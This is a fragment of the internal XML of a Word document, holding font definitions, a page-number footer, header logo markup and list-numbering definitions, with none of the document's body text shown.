    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:characterSet="GBK"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="288F0000" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:characterSet="iso-8859-1"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:characterSet="iso-8859-1"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI Emoji">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:characterSet="iso-8859-1"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="02000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001"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270D59F" w14:textId="27B8CA49" w:rsidR="00F2295D" w:rsidRDefault="00F2295D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9"/>
      </w:pBdr>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003561D2" w:rsidRPr="003561D2">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2DBFFCFE" w14:textId="77777777" w:rsidR="00C9077A" w:rsidRDefault="00C9077A">
    <w:pPr>
      <w:pStyle w:val="Foote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BEEEE6C" w14:textId="77777777" w:rsidR="00C879E8" w:rsidRDefault="00C879E8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2522088C" w14:textId="77777777" w:rsidR="00C879E8" w:rsidRDefault="00C879E8">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30E5064" w14:textId="62545425" w:rsidR="00F2295D" w:rsidRDefault="003B5EE5" w:rsidP="00F2295D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="003634F6" wp14:editId="224ADF82">
          <wp:extent cx="1781175" cy="504825"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2" name="Picture 1" descr="TPlogoWeb"/>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TPlogoWe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81175" cy="504825"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w14:paraId="582CF8CA" w14:textId="77777777" w:rsidR="00987EBF" w:rsidRDefault="00987EBF" w:rsidP="00F2295D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="cent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015C64A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47C237F6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01C629FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="030E5EAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDF0FD0C"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="034528D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1954FABC"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03F20B63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1792A27A"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="041F3E89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BE6792E"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05163EF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D08C4C0"/>
    <w:lvl w:ilvl="0" w:tplc="80EA3A40">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="07DA5ED3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D586604"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0A8C6119"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FD63A39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2CE0CCA"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="159F35F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A6480DA"/>
    <w:lvl w:ilvl="0" w:tplc="690EDD7A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"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11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C620B76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E04EB324"/>
    <w:lvl w:ilvl="0" w:tplc="D7F462DA">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="23506C0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="287C5B66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55F036EE"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="72pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005">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14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2EB215B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F187C68"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="30A30D95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A192CFF0"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35FA6495"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3416ACC0"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="366803F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5DA120A"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AD24CE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ECECCA9A"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AD53208"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3C345919"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4FED480"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="44523602"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4CDE30D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C128418"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4CDF3D78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D29C3968"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="53583065"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A4A7F60"/>
    <w:lvl w:ilvl="0" w:tplc="48090011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D7F462DA">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="72pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:ind w:start="108pt" w:hanging="9pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4809000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="144pt" w:hanging="18pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="180pt" w:hanging="18pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:ind w:start="216pt" w:hanging="9pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4809000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="252pt" w:hanging="18pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="288pt" w:hanging="18pt"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:ind w:start="324pt" w:hanging="9pt"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60D21CC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="798C58EE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="124.35pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F9C00F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0362FE6"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003">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27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="708746F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51AC8FB0"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="758D7DA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD260928"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="129.35pt" w:hanging="23pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>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108pt" w:hanging="90pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79377C59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01322378"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="36pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:ind w:start="72pt" w:hanging="18pt"/>
      </w:pPr>
      <w:rPr>
